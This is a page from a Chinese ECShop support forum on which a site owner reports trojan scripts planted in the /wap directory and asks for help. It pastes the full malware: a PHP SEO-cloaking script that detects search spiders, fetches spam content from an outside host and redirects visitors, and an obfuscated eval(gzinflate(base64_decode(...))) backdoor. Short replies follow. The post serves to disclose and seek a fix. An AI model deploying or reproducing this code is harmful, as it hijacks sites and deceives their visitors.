ecshop模板问答ecshop二次开发问答ecshop分享ecshop模板文档

wap目录挂马，劫持搜索引擎快照

2016-07-07 15:12 来源：www.chinab4c.com 作者：ecshop专家

两个木马脚本，在/article.php中引入了他们，结果我的文章快照全被劫持
脚本内容如下/wap/init.php

<?php
if(! function_exists("gg") && $c=='' ){function gg($url){$ch = curl_init($url);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$contents = curl_exec($ch);return $contents;}if(!defined("myhost")){
define("myhost","?domain={$_SERVER['HTTP_HOST']}&i={$_SERVER['REQUEST_URI']}");} $tiaourl="http://www.seo-boys.com/jc/8g8.html";
$tjdaima="<script language='javascript' src='http://count16.51yes.com/click.aspx?id=160664107&logo=12' charset='gb2312'></script>";
$wd = <<<FANRENGU
这其中是关键字列表，论坛不让发见:http://pan.baidu.com/share/link?shareid=480161&uk=1746266667
FANRENGU;
$h=$_SERVER['HTTP_HOST'];$p=$_SERVER['SERVER_PORT'];$p=($p=='80')?'':":{$p}";$wen=$_SERVER['REQUEST_URI'];$wen = preg_replace("~[^\w\-%\/&\.\?=]~isU","",$wen);$u="http://$h$p$wen";$cks2=false;$wd=str_replace(array("\r"),"",$wd);$wda=explode("\n",$wd);foreach($wda as $ww){$w1=trim($ww);if(strlen("徐")==3){$w2=mb_convert_encoding($w1,"gbk","utf-8");}else{$w2=mb_convert_encoding($w1,"utf-8","gbk");}$w11=urlencode($w1);$w22=urlencode($w2);if(stristr($_SERVER['HTTP_REFERER'],$w11)!='' || stristr($_SERVER['HTTP_REFERER'],$w22)!=''){echo $w1;$cks2=true;break;}}$ref=explode(',','baidu,google,soso,sogou');$cks=$ckp=false;$spider=explode(',','Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp');if($_SERVER['HTTP_REFERER']!=''){foreach($ref as $r){if(stristr($_SERVER['HTTP_REFERER'],$r)!=''){$cks=true;break;}}}foreach($spider as $s){if(stristr($_SERVER['HTTP_USER_AGENT'],$s)!=''){$ckp=true;break;}}if(!$cks2 && $cks){$cks=false;}if(!$cks && !$ckp){}else{if($cks){echo "<body onload=\"location.href='{$tiaourl}';\">{$tjdaima}<meta http-equiv='refresh' content='3; url={$tiaourl}'/></body>";exit;}$this_host = $_SERVER['HTTP_HOST'];function a($str){global $u,$wen;if($wen==''){$str=preg_replace("~\?i=(\d+?)~isU","{$u}?i=$1", $str);}else{$str=preg_replace("~\?i=(\d+?)~isU","{$u}&i=$1", $str);}$str=preg_replace("~(&?i=\d+?){2,}~isU","$1", $str);$str=preg_replace("~(\.php)&(i=\d+?)~isU","$1?$2", $str);$str=preg_replace("~\?&(i=\d+?)~isU","?$1", $str);return $str;}function e($u,$k){if ($k=="www.seo-boys.com/jt/8g8.html"){$files=gg($u);return $files;}else{return null;}}$c=e(myhost,'www.seo-boys.com/jt/8g8.html');$c=a($c);if($c!=''){ob_clean();}echo $c;flush();ob_flush();EXIT;}}?>

复制代码

/wap/global.php

<?php
/*
*/
eval(gzinflate(base64_decode('fZJPS8QwEMXPu7DfIZSFbUFbvbq7Fg9RTyK1ehEp3Xb6R9JOSFK6In53pxHdIqWXQF7eL29mmPB6F8pKrpaMrbtUsD1zKmPkVRD0fe/34nDUfoZN8J4FdZvD0Sezs2XWr/CAhoiLrb0+P/EoubnjDzFp2iiDAntQ7jqhhxcevW7u4/gxOdk2b54l68KFRpqP/86I3/KIR2TzPlfLBUX8yFCAAjWU2jr2g6/hAKFh2jaqpVMihwxzmMk6fUmFEStRu6Pmzhzq2vG8wTAawqXFZigt6xzUNLiY40Sn5DQ2QzWQ16lMlWlB6fMSsRQwn/0rkmrHDVmFrKgFJCWYJMPWQGsohbbkb0Qhbc83')));
?>

复制代码

目前没有彻底解决隐患，不过其中连接有heishou的站点大家heidiao丫的：www.seo-boys.com http://www.89899.com/

回答：

直接删除这些无用目录

像这种知道是什么漏洞所致吗？v7.2

要不你就换个空间，有次我也总被挂马，直接换服务器就OK了。

相关标签：
ecshopwapecshopfunctionecshopcontentsecshopreturn

常用插件

ecshop注册推荐送现金插件
ecshop中的促销售功能还不是很完善，随着电子商务系统的发展和进步，...
ecshop会员中心订单excel倒出
ecshop会员中心订单excel倒出...
ecshop二次开发商品购买备
ecshop销售统计插件介绍：ecshop二次开发订单销售统计和商品购买备注服...
ecshop二次商品订购人信息
ecshop二次商品订购人信息填写插件,有时候给朋友送花，或者是送礼品的...
ecshop2.7.2退换货申请插件
ecshop2.7.2退换货申请插件,主要是在 ecshop 现在的基础上，对ecshop的订单处...

ecshop热门问答

ecshop字体下载 ecshop笔记本 ecshop横版 ecshop降序 ecshop物流公司 ecshop勾字 ecshop手机评测 ecshop罪恶都市 ecshop语言学习 ecshop店长 ecshop者神 ecshop最低价 ecshop浪差 ecshop量子 ecshop摊位 ecshop燒包 ecshop魔法师 kingshard kingshard插件 weedfs ecshop小京东小京东bug 小京东购物车 ec助理数据导入导出网站 ecshop跳转 sqlserver 商城求解！！

ecshop热门资料

ecshop分类图标 mysql版本 ecshop导航 ecshop雷达 ecshop360模板前台换颜色 ecshop开发项目 ecshop老杨ECSHOP ecshop隐藏菜单 ecshop爬虫 ecshop实践 ecshop轮播 ecshop求助啊！ ecshop中文繁体 ecshop费用 ecshopmedium ecshop中奖 Server Error ecshopuploaded 数据转换 ecshop修复 ecmall邮件 ecshop解决方法 ecshopECSHOP优惠套餐插件 ecshop来电 ecshop1103 ecshop逗号 ecshop订单表 ecshop杨卫泽 ecshop服务器 ecshop不同

wap目录挂马，劫持搜索引擎快照

最近更新

常用插件

ecshop热门问答

ecshop热门资料

ecshopwap相关

ecshopfunction相关

ecshopcontents相关

ecshopreturn相关